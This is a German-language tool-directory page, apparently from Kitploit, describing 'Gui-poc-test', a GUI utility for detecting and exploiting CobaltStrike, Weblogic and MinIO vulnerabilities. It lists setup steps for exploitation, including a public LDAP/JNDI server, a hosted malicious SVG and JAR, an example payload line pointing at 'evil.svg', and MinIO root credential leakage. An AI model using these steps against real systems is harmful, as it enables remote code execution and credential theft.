Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Gui-poc-test — Ein Testwerkzeug für CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 | Kitploit
Tools/GitHubGitHub/romanc9/gui-poc-test
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsPayload-Entwicklung
GitHubromanc9/gui-poc-test

Gui-poc-test

Ein Testwerkzeug für CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Gui-poc-test

A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

Grafisches Tool zur Erkennung und Ausnutzung dieser drei Schwachstellen

Wichtige Hinweise

  1. Zum Ausführen der JAR-Datei wird Java 8 benötigt.
  2. Für einzelne Ziele, nicht für Multi-IP-Schwachstellenscans geeignet.
  3. Beim Packen muss für die Weblogic-Ausnutzung wlfullclient.jar eingebunden werden; muss selbst hinzugefügt werden.

Usage

java -jar Gui-poc-test.jar

Verwendung: Es gibt zwei Schaltflächen: Erkennung und Ausnutzung. Die unterschiedliche Verwendung je nach Schwachstelle wird in der Tool-Oberfläche angezeigt.

MinIO Informationsleck

Ziel eingeben, kein Port erforderlich, Standard 9000, änderbar, siehe Quellcode GuiDemo.java:Zeile 144

Gibt MINIO_ROOT_USER und MINIO_ROOT_PASSWORD usw. zurück.

image

Weblogic RCE

Ziel-IP, Port und LDAP-Serveradresse eingeben

Erkennung:

image

Hinweis: Für die Ausnutzung muss ein eigener LDAP-Server (öffentlich) eingerichtet werden.

  • JNDI-Server-Tool: Verwenden Sie JNDIExploit.jar, um LDAP- und WEB-Dienste zu starten. Referenz: https://github.com/WhiteHSBG/JNDIExploit
image

CobaltStrike RCE

  1. Nach Auswahl der Schwachstelle wird standardmäßig die Methode zur Selbstprüfung angezeigt. Geben Sie im CS-Listener den Erkennungscode ein, um selbst zu testen, ob die Schwachstelle vorhanden ist.
  2. Voraussetzung für die Ausnutzung: Lokal wurde bereits der Trojaner (exe) des Ziels erlangt.
  3. Laufzeitumgebungsanforderungen: Windows, Python 3, pip3 installiert frida-tools.
  4. Python ist in der Umgebungsvariable PATH.
  5. Eigenen Server einrichten, um SVG-Datei und JAR-Paket zu hosten, die vom Ziel erreichbar sind.
  6. Absoluten Pfad der exe und SVG-Adresse eingeben, durch Leerzeichen getrennt, auf Ausführen klicken, um Gegenmaßnahmen zu ergreifen.
  7. Inhalt des JAR-Pakets selbst festlegen; das Demonstrationsbeispiel öffnet den Taschenrechner.
  8. Standard-Trojaner-Name ist beacon, änderbar, siehe Quellcode cve_2022_39197.py:Zeile 28.

Beispiel-Payload: beacon.exe http://127.0.0.1:4444/evil.svg

Ergebnis: Der Trojaner läuft unter Windows, der CS-Client auf dem Mac verbindet sich.

Gleichzeitig führt der CS-Server den Inhalt des JAR-Pakets aus und öffnet den Taschenrechner.

image

Windows protokolliert die CS-Zugriffsadresse.

image

Referenzen

Prinzip: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md

https://github.com/4ra1n/CVE-2023-21839

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

https://github.com/its-arun/CVE-2022-39197

CS-Patch: https://github.com/burpheart/CVE-2022-39197-patch

Tool herunterladen